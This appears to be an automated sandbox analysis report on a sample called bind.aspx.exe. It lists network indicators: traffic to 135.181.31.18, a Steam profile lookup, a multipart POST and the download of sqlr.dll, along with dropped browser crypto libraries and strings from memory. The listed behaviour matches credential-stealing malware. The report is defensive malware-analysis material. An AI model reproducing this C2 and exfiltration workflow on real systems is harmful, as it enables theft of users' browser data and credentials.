                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_0034502A InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,4_2_0034502A
                    Source: global trafficHTTP traffic detected: GET /profiles/76561199761128941 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 135.181.31.18Connection: Keep-AliveCache-Control: no-cache
                    Source: bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                    Source: global trafficDNS traffic detected: DNS query: stadiatechnologies.com
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGIJKEHCAKFCAKFHDAAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 135.181.31.18Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                    Source: bind.aspx.exeString found in binary or memory: http://64532127VdtSrezylanAPHTGetSystemInfoGetSystemTimeSleepkernel32.dllSymMatchStringInternetSetOp
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://ocsp.digicert.com0
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://ocsp.digicert.com0A
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://ocsp.digicert.com0C
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://ocsp.digicert.com0N
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://ocsp.digicert.com0X
                    Source: bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://stadiatechnologies.com
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://stadiatechnologies.com/
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://stadiatechnologies.com/(
                    Source: bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://stadiatechnologies.comntent-Disposition:
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                    Source: bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://www.digicert.com/CPS0
                    Source: bind.aspx.exe, mozglue.dll.4.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                    Source: bind.aspx.exeString found in binary or memory: http://www.sqlite.org/copyright.html.
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                    Source: 76561199761128941[1].htm.4.drString found in binary or memory: https://135.181.31.18
                    Source: bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://135.181.31.18/
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://135.181.31.18/$
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://135.181.31.18/-n
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://135.181.31.18/0n9:6
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://135.181.31.18/;n
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://135.181.31.18/Fn
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://135.181.31.18/S
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://135.181.31.18/Tn%:2
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://135.181.31.18/_n
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://135.181.31.18/h
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://135.181.31.18/lnm:
                    Source: bind.aspx.exe, 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://135.181.31.18/sqlr.dll
                    Source: bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://135.181.31.18/x
                    Source: bind.aspx.exe, 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://135.181.31.18FCBG
                    Source: bind.aspx.exe, 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://135.181.31.18T
                    Source: BKKFHI.4.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                    Source: 76561199761128941[1].htm.4.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.00000000036F8000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, FBFIJJ.4.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.00000000036F8000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, FBFIJJ.4.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
                    Source: BKKFHI.4.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: BKKFHI.4.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: BKKFHI.4.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                    Source: bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
                    Source: bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg
                    Source: bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP
